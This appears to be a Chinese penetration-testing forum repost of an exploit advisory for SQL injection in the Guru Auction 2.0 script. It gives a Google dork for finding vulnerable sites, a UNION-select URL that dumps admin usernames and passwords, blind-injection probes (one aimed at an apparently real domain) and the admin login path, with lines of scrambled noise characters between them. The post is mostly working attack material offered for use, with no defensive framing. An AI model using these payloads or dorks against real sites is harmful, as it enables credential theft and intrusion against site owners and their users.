中国网络渗透测试联盟
标题:
Guru Auction 2.0多重sql注射
[打印本页]
作者:
admin
时间:
2012-12-31 09:24
标题:
Guru Auction 2.0多重sql注射
Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
! e2 Z' u( I. X) c, k/ L
* u2 W1 e2 z( B- t T, d& E
作者 : v3n0m
1 N0 a% R8 S" I5 R( A
应用 : Guru Auction 2.0
3 j& c2 A C- R% f8 P3 f2 k
Price : $49
7 r; Z) e& L+ N% j+ w1 c
Vendor :
http://www.guruscript.com/
6 J @7 L- l3 r. U
Google Dork : inurl:subcat.php?cate_id=
; _, E3 h) Q4 g5 M& K, o7 N
' }6 n: C$ I9 l: D: o/ |( u
SQLi p0c:
7 W. E: g, L% k" J% I
~~~~~~~~~~
8 d2 p# Z; p2 k V+ G: c/ \1 K# ~6 ]
http://domain.tld/
[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
. _* D/ D* y( U7 m- p: q
' `1 E. E" l) O+ W( y) ^# S
: E5 p2 |! H& p, y( n Z. P& ~
盲注 p0c:
4 x( K3 `1 ]3 W' f1 {
~~~~~~~~~~
) G; X% L x. a* E: F% u! p" B
http://www.political-security.com
/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
. T$ M* [6 ~8 O' x# c
http://domain.tld/
[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
8 b8 ^: Z8 ~7 \
' B& X5 A( v! I( M/ {' k. S* `# }
管理登录入口:
8 m4 x9 L7 y, |& s( X
~~~~~~~~~~
; L6 m4 W8 C7 E: c" Z
http://domain.tld/
[path]/admin/
* S' n8 Q; h7 C- ^+ \4 W) C
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2